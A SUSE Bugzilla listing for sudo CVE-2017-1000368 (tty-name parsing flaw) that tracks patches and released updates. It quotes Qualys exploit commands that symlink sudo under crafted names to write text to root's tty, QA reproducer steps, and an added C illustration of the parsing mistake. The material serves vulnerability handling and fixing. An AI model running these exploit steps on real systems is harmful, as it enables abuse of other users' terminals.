Bugzilla – Full Text Bug Listing
| Summary: | VUL-0: CVE-2017-1000368: sudo: path traversal race conditions, follow up problem | ||
|---|---|---|---|
| Product: | [Novell Products] SUSE Security Incidents | Reporter: | Marcus Meissner <meissner> |
| Component: | Incidents | Assignee: | Security Team bot <security-team> |
| Status: | RESOLVED FIXED | QA Contact: | Security Team bot <security-team> |
| Severity: | Major | ||
| Priority: | P2 - High | CC: | astieger, bhavel, christos.varelas, forgotten_y-Bqn7eYAj, heiko.rommel, jsegitz, kstreitova, meissner, mpluskal, mrueckert, rosuna, simonf.lees, tchvatal, vcizek, vpelcak |
| Version: | unspecified | ||
| Target Milestone: | --- | ||
| Hardware: | Other | ||
| OS: | Other | ||
| URL: | https://smash.suse.de/issue/185360/ | ||
| Whiteboard: | CVSSv2:SUSE:CVE-2017-1000368:7.2:(AV:L/AC:L/Au:N/C:C/I:C/A:C) CVSSv3:SUSE:CVE-2017-1000368:8.4:(AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) CVSSv2:NVD:CVE-2017-1000368:7.2:(AV:L/AC:L/Au:N/C:C/I:C/A:C) CVSSv3:SUSE:CVE-2017-1000368:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) CVSSv3:RedHat:CVE-2017-1000368:7.8:(AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) | ||
| Found By: | --- | Services Priority: | |
| Business Priority: | Blocker: | --- | |
| Marketing QA Status: | --- | IT Deployment: | --- |
| Bug Depends on: | 1039361 | ||
| Bug Blocks: | |||
| Attachments: | QA reproducer | ||
Description
Marcus Meissner
2017-06-01 09:56:04 UTC
The upstream patch from 1.8.20p1 recursively searches only search_devs[]. If a device is not found there, sudo_ttyname_scan() then doesn't descend into directories when it browses the rest of /dev. The patch we use in SLE-12/Leap adds /dev/shm and /dev/mqueue to ignore_devs[]. So when sudo does the BFS /dev scan for the tty device, they aren't searched at all, which prevents the symlink trickery from the Qualys exploit.

On Fri, Jun 02, 2017 at 12:55:10PM -0600, Todd C. Miller wrote:
> However, the arbitrary tty access IS exploitable in 1.8.20p1.

For example, against Sudo < 1.8.20p1:

$ /usr/bin/sudo -l
...
User john may run the following commands on localhost:
    (nobody) /usr/bin/sum
$ ln -s /usr/bin/sudo ' 1026 '
(1026 is tty2, currently used by root)
$ ./' 1026 ' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'
(this is written to root's tty2)

Or, against Sudo = 1.8.20p1:

$ ln -s /usr/bin/sudo $') 1026 \n'
$ ./$') 1026 \n' -r unconfined_r -u nobody /usr/bin/sum $'--\nHELLO\nWORLD\n'

CVE-2017-1000368 was assigned to this newline vulnerability:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000368

With best regards,
--
the Qualys Security Advisory team

I can confirm that our packages are vulnerable to this new attack vector.

Created attachment 727965 [details]
QA reproducer
QA, to reproduce:
- Install selinux-policy-minimum
- boot with security=selinux selinux=1 enforcing=0
- get the path of the root's terminal with:
# tty
- now as the sudo user on a different terminal:
$ cc CVE-2017-1000368.c -o CVE-2017-1000368 -lutil
$ ./CVE-2017-1000368 <PATH_TO_ROOT_TTY>
If affected, on the root's tty will appear:
/usr/bin/sum: unrecognized option '--
HELLO
WORLD
'
Try '/usr/bin/sum --help' for more information.
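The symlink names quoted above work because sudo learns its controlling tty from field 7 (tty_nr) of /proc/[pid]/stat, while field 2 (comm) is derived from the attacker-chosen executable name and may contain spaces, parentheses and newlines. The following is an added illustration of that parsing pitfall, not sudo's code and not part of this bug report or the upstream fix: the three stat records are constructed, naive_tty_nr mimics a line-oriented parser that counts every single space as a field separator, and robust_tty_nr scans the complete buffer for the last ')' before counting fields. The field numbering and the dev_t major/minor layout are Linux's; the five-space padding in the constructed comm is chosen to defeat this particular naive parser and is an assumption about how such a name would need to look.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed /proc/[pid]/stat records (not captured from a real system).
 * Field 2 (comm) sits in parentheses; field 7 is tty_nr. The real tty in
 * all three records is 34817 = major 136, minor 1 = /dev/pts/1. */
static const char STAT_BENIGN[] =
    "4242 (sudo) S 1 4242 4242 34817 4242 4194304 0\n";
/* comm = "     1026 " : five leading spaces shift a space-counting parser
 * so that "1026" (major 4, minor 2 = /dev/tty2) lands in field 7. */
static const char STAT_SPACES[] =
    "4242 (     1026 ) S 1 4242 4242 34817 4242 4194304 0\n";
/* comm = ") 1026 \n" : a ')' and a newline inside comm; a parser that only
 * looks at the first line never reaches the real fields at all. */
static const char STAT_NEWLINE[] =
    "4242 () 1026 \n) S 1 4242 4242 34817 4242 4194304 0\n";

/* Linux dev_t layout as encoded in tty_nr. */
unsigned int dev_major(unsigned long dev) { return (dev >> 8) & 0xfffU; }
unsigned int dev_minor(unsigned long dev) { return (dev & 0xffU) | ((dev >> 12) & 0xfff00U); }

/* Fragile parser: walks the first line only (what getline() would hand
 * over) and treats every single space as a field separator, so empty
 * fields count. Returns -1 if field 7 is never reached. */
long naive_tty_nr(const char *stat)
{
    const char *cp = stat, *ep = stat;
    int field = 0;
    for (; *ep != '\0' && *ep != '\n'; ep++) {
        if (*ep != ' ')
            continue;
        if (++field == 7) {
            char *end;
            long v = strtol(cp, &end, 10);
            return end > cp ? v : -1;
        }
        cp = ep + 1;
    }
    return -1;
}

/* Robust parser: comm is the only field that may hold arbitrary bytes and
 * the only one wrapped in parentheses, so the LAST ')' in the complete
 * buffer ends it. Everything after it is a fixed sequence of fields
 * separated by runs of spaces: 3 state, 4 ppid, 5 pgrp, 6 session, 7 tty_nr. */
long robust_tty_nr(const char *stat, size_t len)
{
    const char *rp = NULL;
    for (size_t i = 0; i < len; i++)
        if (stat[i] == ')')
            rp = stat + i;
    if (rp == NULL)
        return -1;
    const char *cp = rp + 1;
    for (int field = 3; field <= 7; field++) {
        while (*cp == ' ')
            cp++;
        if (*cp == '\0' || *cp == '\n')
            return -1;
        if (field == 7) {
            char *end;
            long v = strtol(cp, &end, 10);
            return end > cp ? v : -1;
        }
        while (*cp != ' ' && *cp != '\0')
            cp++;
    }
    return -1;
}

static void show(const char *label, const char *stat)
{
    long n = naive_tty_nr(stat), r = robust_tty_nr(stat, strlen(stat));
    printf("%-8s naive=%ld robust=%ld (robust -> major %u minor %u)\n",
           label, n, r, dev_major((unsigned long)r), dev_minor((unsigned long)r));
}

int main(void)
{
    show("benign", STAT_BENIGN);
    show("spaces", STAT_SPACES);
    show("newline", STAT_NEWLINE);
    printf("1026 decodes to major %u minor %u (/dev/tty2)\n",
           dev_major(1026), dev_minor(1026));
    return 0;
}
```

On the constructed records the naive parser reports 1026 for STAT_SPACES and fails to find any tty for STAT_NEWLINE, while the robust parser returns 34817 for all three. The kernel truncates comm to 15 bytes, which both attacker names above fit into, so name length is no defence. Whitespace runs in the quoted command lines may have been collapsed by the bug listing, so treat the exact padding here as an assumption; the authoritative fix is the upstream commit referenced later in this bug, and this block only shows the class of mistake it addresses.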
This is already fixed in tumbleweed, the newer patch was already available there so I used that.

(In reply to Simon Lees from comment #5)
> This is already fixed in tumbleweed, the newer patch was already available
> there so I used that.

The "newer patch" (from bug 1039361 comment 23) is just a different approach to fix CVE-2017-100037. This bug (CVE-2017-100038) is fixed by https://www.sudo.ws/repos/sudo/rev/9ad60fe663e5.
Anyway, Michael Stroeder fixed Tumbleweed by the update to 1.8.20p2.

In home:simotek:branches:OBS_Maintained:sudo/sudo.SUSE_SLE-12-SP2_Update, you're backporting a wrong patch. The one we have there is sufficient to fix CVE-2017-100037, just add the commit mentioned above.

(In reply to Vítězslav Čížek from comment #6)
> to fix CVE-2017-100037.
> This bug (CVE-2017-100038) is fixed by

Sorry, the numbers above should read CVE-2017-1000367 and CVE-2017-1000368 respectively.

Kristyna,
Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed.

(In reply to Vítězslav Čížek from comment #11)
> Kristyna,
> Please update sudo in SLE-12-SP3. Otherwise all other codestreams are fixed.

Sudo in SLE-12-SP3 was updated to 1.8.20p2 (sr#134136).
It seems that everything is fixed here. Reassigning it back to the security team.

Is version 1.7.X also affected? (SLES 11 SP3 LTSS, for instance)
In that case, I'll open a separate bug requesting a PTF. Thanks!

No, both CVE-2017-1000367 and CVE-2017-1000368 affect only the 1.8 branch of sudo.
See https://www.sudo.ws/alerts/linux_tty.html
Just versions 1.8.5-1.8.20p2 are vulnerable.

SUSE-SU-2017:1626-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
SUSE Linux Enterprise Software Development Kit 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Server 12-SP2 (src): sudo-1.8.10p3-10.10.2
SUSE Linux Enterprise Desktop 12-SP2 (src): sudo-1.8.10p3-10.10.2
OpenStack Cloud Magnum Orchestration 7 (src): sudo-1.8.10p3-10.10.2

SUSE-SU-2017:1627-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
SUSE OpenStack Cloud 6 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server for SAP 12-SP1 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server for SAP 12 (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server 12-SP1-LTSS (src): sudo-1.8.10p3-2.16.1
SUSE Linux Enterprise Server 12-LTSS (src): sudo-1.8.10p3-2.16.1

openSUSE-SU-2017:1697-1: An update that solves one vulnerability and has one errata is now available.

Category: security (important)
Bug References: 1034560,1042146
CVE References: CVE-2017-1000368
Sources used:
openSUSE Leap 42.2 (src): sudo-1.8.10p3-9.6.1

released